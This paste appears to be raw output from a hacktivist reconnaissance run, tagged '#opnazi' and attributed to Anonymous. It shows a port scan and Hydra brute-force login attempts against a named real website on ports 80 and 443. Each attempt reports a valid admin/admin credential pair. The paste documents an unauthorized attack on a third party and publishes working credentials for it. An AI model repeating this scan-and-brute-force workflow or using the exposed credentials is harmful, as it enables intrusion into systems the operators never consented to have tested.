- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2017-09-28 11:47:49
- [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
- [DATA] attacking http-get://altright.com:80//
- [80][http-get] host: altright.com login: admin password: admin
- [STATUS] attack finished for altright.com (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2017-09-28 11:47:50
- + -- --=[Port 110 closed... skipping.
- + -- --=[Port 139 closed... skipping.
- + -- --=[Port 162 closed... skipping.
- + -- --=[Port 389 closed... skipping.
- + -- --=[Port 443 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2017-09-28 11:47:50
- [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
- [DATA] attacking http-gets://altright.com:443//
- [443][http-get] host: altright.com login: admin password: admin
- [STATUS] attack finished for altright.com (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2017-09-28 11:47:52
- + -- --=[Port 445 closed... skipping.
- + -- --=[Port 512 closed... skipping.
- + -- --=[Port 513 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 993 closed... skipping.
- + -- --=[Port 1433 closed... skipping.
- + -- --=[Port 1521 closed... skipping.
- + -- --=[Port 3306 closed... skipping.
- + -- --=[Port 3389 closed... skipping.
- + -- --=[Port 5432 closed... skipping.
- + -- --=[Port 5900 closed... skipping.
- + -- --=[Port 5901 closed... skipping.
- + -- --=[Port 8000 closed... skipping.
- + -- --=[Port 8080 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2017-09-28 11:47:52
- [ERROR] The web page you supplied must start with a "/", "http://" or "https://", e.g. "/protected/login"
- + -- --=[Port 8100 closed... skipping.
- + -- --=[Port 6667 closed... skipping.
- #####################################################################################################################################################################################################################################################################################################################################################################################################################
- JTSEC full recon Anonymous #opnazi #3
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement